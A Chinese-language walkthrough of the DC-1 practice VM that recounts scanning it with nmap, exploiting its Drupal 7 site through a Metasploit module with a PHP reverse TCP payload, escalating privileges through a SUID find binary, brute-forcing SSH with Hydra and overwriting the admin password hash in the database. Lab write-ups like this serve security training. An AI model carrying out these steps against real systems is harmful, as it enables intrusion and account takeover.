DC-1

DC-1靶站GET点

直接网上下载DC1-9系列的靶站，今天要渗透的是DC-1
老样子：

vm靶机挂着，没有账号密码，也不能登录进去看看，但是一开机，环境已经启动了
不知道开启了什么服务，常规扫描走一波
直接上个全扫描
第一波建议上大规模扫描，记住，一定要大规模！靓仔，我在监狱等你哟
从nmap详细扫描信息中发现主机开发了22端口和80服务
22端口可以用来爆破
80服务用的drupalcms 版本为7
去web站点看看

这里又扫了一下目录，各种敏感目录看了一下，没有getshell的点

这里分析一下Drupal cms ，这个是国外三大主要的cms之一
有能直接getshell的漏洞，且无需登录。

如果遇到用cms的网站，都建议把exp打一遍，没准有惊喜

选择2018年的这个。

填上靶机ip：set RHOSTS 192.168.206.138
设置攻击载荷，这里因为靶站是php，就用个php reverse_tcp隧道

设置攻击机的ip地址
set LHOST 192.168.206.128

然后就run

成功拿到shell，进入交互式模式

这里看到是网站权限所有我们得提权
提权辅助脚本走一波，没有get点
然后就试试了uid提权：
uid提权介绍
然后搜索一波存在哪些有root权利的可执行文件
然后发现了find这个命令，可以进行内核提权

这里直接提升权限为管理员！然后直接用此权限反弹shell或者正向shell，这里提供了两种方法：
正向shell：
靶机
攻击机

反向shell：


查看了一下开发的端口情况，发现3306端口，我的nmap咋没扫到嘞，奇怪
然后本地连接一下，去找找网站的管理员账号密码
必须拿到数据库的账号密码，然后我们之间去看网站的配置文件，一般有数据库链接的账号密码
查看flag1
也是提醒去找配置文件
百度了一下这个cms网站配置目录是
/var/www/sites/default/settings.php

成功拿到数据库账号和密码
本地登录：

在这种shell环境下无法连接数据库，必须ssh到他本地去
然后前面看到开放了22端口，直接九头蛇爆破，但是得先找个能爆破的账号：

直接爆破flag4这个用户，当然你可以直接爆破root这个用户，但要看本地是否允许root用户ssh，我可以去改，但是麻烦了，反正可以提权
九头蛇直接拿到flag4的密码。orange
直接ssh去连

然后连接本地数据库

然后一波常规操作

找到users这个表：
admin这个账号uid为1，password经过加密，这里都拿到数据库，懒得解密了，直接替换一波密码。利用本地加密
切记一定要去/var/www这个目录下，不然提示没有bash

然后web登录

找到了flag3

通过flag3的提示，成功提权找到flag4，然后通过提权在root用户的家目录
拿到最后一个flag

见证菜鸡的信息之旅！